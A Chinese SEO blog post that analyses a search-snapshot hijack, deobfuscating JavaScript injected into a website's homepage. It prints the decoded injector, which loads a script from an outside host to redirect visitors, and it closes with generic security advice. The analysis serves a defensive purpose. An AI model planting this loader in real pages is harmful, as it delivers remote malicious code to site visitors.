• AG8游戏博客公告栏:深圳AG8游戏专注于SEO优化培训,免费给深圳SEO爱好者提供SEO技术培训教程,兼深圳地区公司网站排名优化等服务!

解析JS快照被黑客劫持该怎么处理?

SEO优化 AG8游戏博主 6次浏览 未收录 0个评论 扫描二维码

哈喽,大家好我是深圳SEOAG8游戏,想必各位站长、SEO爱好者们经常会遇到js快照被黑客做了劫持的问题,被黑客做了劫持后对网站的优化带来及大的影响。对于很多新手站长和SEO爱好者来说js快照劫持,束手无策。今天深圳SEOAG8游戏就来讲下被黑客劫持后的处理方法。

解析JS快照被黑客劫持该怎么处理?

一,js快照劫持示例

js快照劫持演示图,记录了是网站跳转的。

一个是百度搜索快照劫持演示。另一个是搜狐搜索快照劫持演示。

解析JS快照被黑客劫持该怎么处理?

JS快照劫持,百度搜索演示图

解析JS快照被黑客劫持该怎么处理?

JS快照劫持,搜狐搜索演示图

 

二,分析js快照劫持代码

经分析,网站首页被植入了恶意了代码,而且是多次加密JS代码。

解析JS快照被黑客劫持该怎么处理?

此段代码就是添加在网站首页的JS,而且属于了加密了的代码,一般看不出什么猫腻。

三,加密JS层层分析

接下来进行JS反向解析分析。可以使用站长工具在线分析:http://tool.chinaz.com/js.aspx

解析JS快照被黑客劫持该怎么处理?

站长工具JS混淆加密压缩 截图

解析后,可以看到真面目,这段代码。

< script type = “text/javascript” >
document.writeln(“<script src=http://www.5121188.com/main2.js></script>”); < /script>

打开这个main2.js可以看到一段落代码。

解析JS快照被黑客劫持该怎么处理?

JS恶意代码二次加密

攻击者真的多有精力,层层加密啊。怪不得一般站长根本无法发现。

然后再进行解密。

解析JS快照被黑客劫持该怎么处理?

被加密的JS恶意代码解析图

这下大家应该清楚了,攻击者对代码进行了3次的加密再调用,来实现百度快照的JS劫持跳转。

四,网站安全建议

网站安全一直是一个让站长和SEO爱好者头痛的问题,再这里深圳SEOAG8游戏敢说没有百分百安全的网站,只有一断的进行维护和优化,做到定期备份,定期检查,最大程度的杜绝网站被黑被劫持的风险。希望各位站长和SEO爱好者清楚并且牢记在心。


深圳SEOAG8游戏博客申明版权隶属:深圳SEO(/)

转载请注明:深圳SEOAG8游戏博客 解析JS快照被黑客劫持该怎么处理?

喜欢 (1)
支付宝[]
分享 (0)
AG8游戏博主
关于作者:
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到